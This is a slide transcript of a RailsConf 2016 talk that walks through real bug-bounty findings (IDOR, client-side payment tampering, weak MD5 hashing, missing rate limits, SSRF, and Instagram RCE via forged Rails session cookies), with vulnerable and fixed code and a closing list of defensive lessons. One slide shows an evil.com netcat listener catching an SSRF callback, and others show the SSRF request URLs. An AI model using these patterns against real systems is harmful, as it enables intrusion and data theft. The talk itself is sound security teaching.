"...But Doesn't Rails Take Care of Security for Me?"

@presidentbeef
“...But Doesn’t Rails Take
Care of Security for Me?”
“...But Doesn’t Rails Take
Care of Security for Me?”
Justin Collins
@presidentbeef
RailsConf 2016
Justin Collins
@presidentbeef
RailsConf 2016

View Slide

@presidentbeef
No.

View Slide

@presidentbeef
Thank you!

View Slide

@presidentbeef
Ugh about me
6 years of application security
(AT&T Interactive, Twitter, SurveyMonkey)
6 years working on Brakeman OSS
(Static analysis security tool for Rails)
2 years working on
(More pro static analysis security tool for Rails)

View Slide

@presidentbeef
What Rails Does and Doesn’t

View Slide

@presidentbeef
Security Theater

View Slide

@presidentbeef

View Slide

@presidentbeef
https://hackerone.com/reports/27404

View Slide

@presidentbeef

View Slide

@presidentbeef
POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152

View Slide

@presidentbeef
POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220151

View Slide

@presidentbeef
PaymentMethod.find(params[:id]).delete

View Slide

@presidentbeef
“Insecure Direct Object Reference”
“Unscoped Find”

View Slide

@presidentbeef
current_user.payment_methods.find(params[:id]).delete

View Slide

@presidentbeef
Bounty: $2,800

View Slide

@presidentbeef
https://randywestergren.com/united-airlines-bug-bounty-an-experience-in-reporting-a-serious-vulnerability/

View Slide

@presidentbeef
Proxy

View Slide

@presidentbeef
POST https://smartphone.continental.
com/UnitedMobileDataServices/api/wallet/AccessWalletItemsv2
{
"accessCode": "'",
"application": {
"version": {
"build": "",
"displayText": "2.0.20",
"major": "",
"minor": ""
},
"name": "Android",
"isProduction": true,
"id": 2
},
"deviceID": "37556b06-66bf-40a3-9368-f13b0faa437d",
"languageCode": "en-US",
"mpNumber": "***REMOVED***",
"pushToken": "***REMOVED***",
"transactionId": "***REMOVED***",
"backgroundRefresh": true
}

View Slide

@presidentbeef
{
"walletPNRResponse": {
"pnrs": [
{
"recordLocator": "***REMOVED***",
"flightDate": "12/05/2015 06:35 PM",
"origin": "PHL",
"originCity": "Philadelphia",
"destination": "MCO",
"destinationCity": "Orlando",
"checkInStatus": "0",
"firstName": "RANDOLPHA",
"lastName": "WESTERGRENJR",
"segments": [
{
"carrierCode": "UA",
"flightNumber": "3336",
"origin": "PHL",
"destination": "IAD",
"scheduledDepartureDateTime": "12/5/2015 6:35 PM",
"scheduledArrivalDateTime": "12/5/2015 7:41 PM",
"scheduledDepartureDateTimeGMT": "12/05/2015 11:35 PM",
"scheduledArrivalDateTimeGMT": "12/06/2015 12:41 AM",
"seats": "",
"activationDateTimeGMT": "",
"flightStatusSegment": null,
"flightStatus": null,
"destinationWeather": null,
"lastUpdated": "05/27/2015 07:31 AM",
"enableUberLinkButton": false,
"cabin": "Coach",
"cabinType": "United Economy"
},
#...

View Slide

@presidentbeef
{
"walletPNRResponse": {
"pnrs": [
{
"flightDate": "12/05/2015 06:35 PM",
"origin": "PHL",
"originCity": "Philadelphia",
"destination": "MCO",
"destinationCity": "Orlando",
"checkInStatus": "0",
"firstName": "RANDOLPHA",
"lastName": "WESTERGRENJR",
#...

View Slide

@presidentbeef

View Slide

@presidentbeef
Bounty: $0 (Duplicate)

View Slide

@presidentbeef
http://www.ifc0nfig.com/dominos-pizza-and-payments/

View Slide

@presidentbeef
1. CC # 2. Success
Ref #
3. Order #
Ref #

View Slide

@presidentbeef
1. CC # 2. Failure
Ref #
X

View Slide

@presidentbeef
WARNING: XML AHEAD

View Slide

@presidentbeef
Payment Failure Response

NOT AUTHORISED
VISA

3340105259009953
3340105259009953
LIVE
DECLINED
7
1449024000

View Slide

@presidentbeef
Payment Failure Response

NOT AUTHORISED
VISA

3340105259009953
3340105259009953
LIVE
SUCCESS
1
1449024000

View Slide

@presidentbeef
1. CC # 2. Failure
Ref #
X

View Slide

@presidentbeef
1. CC # 2. Success
Ref #
X

View Slide

@presidentbeef
1. CC # 2. Success
Ref #
3. Order #
Ref #

View Slide

@presidentbeef

View Slide

@presidentbeef
Lack of Server-Side Validation

View Slide

@presidentbeef
http://cynosureprime.blogspot.com/2015/09/how-we-cracked-millions-of-ashley.html

View Slide

@presidentbeef
~36 million passwords leaked

View Slide

@presidentbeef
~36 million passwords leaked
Hashed with bcrypt (good)

View Slide

@presidentbeef
WARNING: PHP CODE AHEAD

View Slide

@presidentbeef
But...
$password = User::encryptPassword($Values['password']);
$loginkey = md5(strtolower($username).'::'.strtolower($password));

View Slide

@presidentbeef
BUT...
$password = $Values['password'];
$loginkey = md5(strtolower($username).'::'.strtolower($password));

View Slide

@presidentbeef
Also...
md5(lc($username)."::".lc($pass).":".lc($email).":73@^bhhs@&^@8@*$")

View Slide

@presidentbeef
2.6 million passwords cracked

View Slide

@presidentbeef
In a few hours

View Slide

@presidentbeef
In a few days

View Slide

@presidentbeef
Weak Hashing Algorithm

View Slide

@presidentbeef
http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html

View Slide

@presidentbeef

View Slide

@presidentbeef
beta.facebook.com

View Slide

@presidentbeef
Missing rate limit

View Slide

@presidentbeef
Bounty: $15,000

View Slide

@presidentbeef
https://hackerone.com/reports/115748

View Slide

@presidentbeef

View Slide

@presidentbeef
https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv

View Slide

@presidentbeef
https://imgur.com/vidgif/url?url=http://bit.ly/1e1EYJv
Server-Side Request Forgery

View Slide

@presidentbeef
https://imgur.com/vidgif/url?url=sftp://bit.ly/1e1EYJv

View Slide

@presidentbeef
Capture Connection Strings
evil.com:$ nc -v -l 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from [54.166.236.232] port 11111 [tcp/*] accepted
CLIENT libcurl 7.40.0
QUIT

View Slide

@presidentbeef
Libcurl supports:
SSH (scp://, sftp://)
POP3
IMAP
SMTP
FTP
DICT
GOPHER
TFTP

View Slide

@presidentbeef
Bounty: $2,000

View Slide

@presidentbeef
http://exfiltrated.com/research-Instagram-RCE.php

View Slide

@presidentbeef
https://sensu.instagram.com/

View Slide

@presidentbeef

View Slide

@presidentbeef
Rails
App

View Slide

@presidentbeef

View Slide

@presidentbeef
Session cookie
is
signed marshalled code

View Slide

@presidentbeef
Signing key
=
Remote code execution

View Slide

@presidentbeef
Forged
Session
Remote
Shell

View Slide

@presidentbeef
And then things got worse...

View Slide

@presidentbeef
Forged
Session
Remote
Shell

View Slide

@presidentbeef
Forged
Session
Remote
Shell
Passwords!

View Slide

@presidentbeef
Forged
Session
Remote
Shell
Passwords!
Bcrypt :(

View Slide

@presidentbeef
Six passwords were "changeme"
Three were same as the user's name
Two were "password"
One was "instagram"

View Slide

@presidentbeef

View Slide

@presidentbeef
Forged
Session
Remote
Shell

View Slide

@presidentbeef
Secret in source code
Outdated dependencies
Weak passwords
Keys sitting on servers

View Slide

@presidentbeef
Bounty: $2,500 + A lot of drama

View Slide

@presidentbeef
In Summary
Verify current user can access data/perform action
Never trust the client - think about trust relationships
Always use strong hashing algorithms
Rate limit important actions
Avoid storing secrets in source code
Always use strong passwords

View Slide

@presidentbeef
More Resources
OWASP Top 10 Web Vulnerabilities
www.owasp.org/index.php/Top_10_2013-Top_10
OWASP Top 10 Proactive Security Controls
www.owasp.org/index.php/OWASP_Proactive_Controls
RailsGoat
https://github.com/OWASP/railsgoat
nVisium SecCasts
https://nvisium.com/seccasts/

View Slide

@presidentbeef
Things I’ll Forget to Mention
I have stickers
Security BoF after Jess’ talk
I am happy to speak at companies in the SF area
@presidentbeef | @brakeman | @brakemanpro

View Slide

"...But Doesn't Rails Take Care of Security for Me?"

"...But Doesn't Rails Take Care of Security for Me?"

Justin Collins

More Decks by Justin Collins

Other Decks in Technology

Featured

Transcript